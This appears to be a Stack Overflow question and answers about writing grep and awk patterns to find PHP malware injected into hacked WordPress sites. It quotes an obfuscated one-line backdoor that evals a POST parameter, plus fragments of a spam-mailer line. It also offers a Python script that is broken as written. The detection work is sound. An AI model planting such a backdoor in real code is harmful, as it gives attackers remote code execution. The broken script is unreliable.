# Need help on Linux Shell Script to find a pattern of strings

Tags: linux, bash, shell

grep is an excellent utility, But when it comes to this particular task, I dont find any Linux command comes handy.

In my server, lots of hacked files are injected mainly on all the wordpress websites. 
The pattern is typically like this.

```
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}'q5dfb07'])) { eval(${$s20}['q5dfb07']); }
```

Now, I am looking for linux command which can find the following strings in a single line.
isset, eval, [0], [1], [2], [3], These strings can come in any order.

I think, using we can do it like, grep eval $name | grep strto | grep isset

Comment: Can you post some real patterns of malware infected file to provide you suggestion.

Comment: $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}'q5dfb07'])) { eval(${$s20}['q5dfb07']); } ==> this is typically the first line, Somehow it sends spam mails.

Answer (score 2):

You can try this `grep -P`:

```
grep -P '(?=.*?isset)(?=.*?eval)(?=.*?\[\d+\])' file.php
```

Or if you don't have `grep` then you can use `awk`:

```
awk '/isset/ && /eval/ && /\[[0-9]+\]/' file.php
```

Comment: Thanks for the answer. The biggest challenge for me is, these orders will vary. It need not come in the same order, this makes it difficult.  

 isset, eval, [0], [1], [2], [3] ==> these orders keep changing for each file, But all are present in the same line.

Comment: I think you probably didn't pay close attention to my answers. Both my commands will work **irrespective of the order of those keywords**. Test it out and let me know if it doesn't work.

Comment: I need 15 reputation, Dont have it now.

Comment: Hello, I need one more help. I am looking for a script to match the following pattern, Please help me with that.

awk '/\[[0-9]+\]{10,}/' defines.php (This is not working.)
awk '/\[[0-9 0-9]\]{10,}/' defines.php (This does not work)

Basically I want to find out the following pattern and delete those files.  The pattern is "[49]" or [xx] occurs at least 10 times in one line, then it is a spam file. 

$r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] =

Comment: The qns: http://stackoverflow.com/questions/27265367/need-shell-script-to-find-this-pattern

Comment: If this worked out you may mark the answer as accepted by clicking on tick mark on top-left of my answer.

Answer (score 0):

Based on the information given here:
http://www.thegeekstuff.com/2011/10/grep-or-and-not-operators/

If the order is important, use this command:

```
grep -E 'pattern1.*pattern2' filename
```

If order doesn't matter, you'll need to format it like this:

```
grep -E 'pattern1.*pattern2|pattern2.*pattern1' filename
```

As you could imagine, this could get pretty ugly. I think the most easily readable one is what you suggest:

```
grep -E 'pattern1' filename | grep -E 'pattern2'
```

However, a simple python program could help you:

```
#!/usr/bin/env python
keys = argv[1:-1]
with open(argv[-1], 'r') as fd:
  for line in fd:
    bool matched = True
    for key in keys:
      if key not in line:
        matched = False
        break
    if matched:
      print(line)
```

You can run this like:

```
python search.py pattern1 pattern2 pattern3 filename
```